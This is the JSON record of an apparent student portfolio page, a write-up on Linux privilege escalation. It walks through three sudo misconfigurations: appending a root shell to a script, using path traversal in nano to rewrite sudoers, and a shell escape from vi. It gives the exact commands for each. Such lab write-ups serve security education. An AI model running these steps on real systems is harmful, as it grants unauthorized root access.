{"id":379,"date":"2025-11-17T19:11:39","date_gmt":"2025-11-17T19:11:39","guid":{"rendered":"https:\/\/sites.wp.odu.edu\/isaac-huston\/?page_id=379"},"modified":"2025-11-17T20:00:07","modified_gmt":"2025-11-17T20:00:07","slug":"privilege-escalation-using-text-editors-write-up","status":"publish","type":"page","link":"https:\/\/sites.wp.odu.edu\/isaac-huston\/skills\/penetration-testing-and-exploitation\/privilege-escalation-using-text-editors-write-up\/","title":{"rendered":"Privilege Escalation using Text Editors Write-up"},"content":{"rendered":"\n

Explains how insecure configurations enable privilege escalation and demonstrates proper mitigation awareness.<\/p>\n\n\n\n

# Linux Privilege Escalation Techniques\n\nThe following scenarios demonstrate common privilege escalation vectors caused by misconfigured sudo permissions.\n\n---\n\n## Scenario 1: Privilege Escalation Using an Executable .sh File\n\nIf a user is allowed to run a script as root without a password, such as:\n\n```\n\nanalyst ALL=(ALL) NOPASSWD: \/path\/to\/test.sh\n\n```\n\nthen the script will execute with full root privileges when run through sudo.\n\n### Steps\n\n1. View the script:\n```\n\ncat \/path\/to\/test.sh\n\n```\n\n2. Append a command to spawn a root shell:\n```\n\necho \"\/bin\/bash -i\" >> \/path\/to\/test.sh\n\n```\n\n3. Execute the script as root:\n```\n\nsudo \/path\/to\/test.sh\n\n```\n\n### Result\nThe user obtains a root shell because the script runs under root\u2019s context.\n\n---\n\n## Scenario 2: Privilege Escalation Using Restricted nano Access\n\nIf sudoers allows nano execution as root but restricts it to a specific directory, for example:\n\n```\n\nanalyst ALL=(ALL) NOPASSWD: \/var\/opt\/nano\n\n```\n\ndirectory traversal can be used to bypass the restriction.\n\n### Steps\n\n1. Access sudoers through a traversal path:\n```\n\nsudo nano \/var\/opt\/..\/..\/etc\/sudoers\n\n```\n\n2. Add full privileges for the user:\n```\n\nanalyst ALL=(ALL) NOPASSWD:ALL\n\n```\n\n3. Save the file and escalate:\n```\n\nsudo -i\n\n```\n\n### Result\nThe user gains full root privileges via sudo.\n\n---\n\n## Scenario 3: Privilege Escalation Using Vim\n\nIf the user can run Vim as root:\n\n```\n\nanalyst ALL=(ALL) NOPASSWD: \/usr\/bin\/vi\n\n```\n\nVim\u2019s built-in shell escape provides immediate privilege escalation.\n\n### Steps\n\n1. Launch Vim as root:\n```\n\nsudo vi file.sh\n\n```\n\n2. Enter command mode and spawn a shell:\n```\n\n:!bash\n\n```\n\nOr use Vim\u2019s command flag:\n\n```\n\nsudo vi -c '!bash'\n\n```\n\n### Result\nVim opens a root shell because the shell command executes under root\u2019s privileges.\n\n---\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Explains how insecure configurations enable privilege escalation and demonstrates proper mitigation awareness.<\/p>\n","protected":false},"author":30346,"featured_media":0,"parent":328,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/379"}],"collection":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/users\/30346"}],"replies":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/comments?post=379"}],"version-history":[{"count":1,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/379\/revisions"}],"predecessor-version":[{"id":380,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/379\/revisions\/380"}],"up":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/328"}],"wp:attachment":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/media?parent=379"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}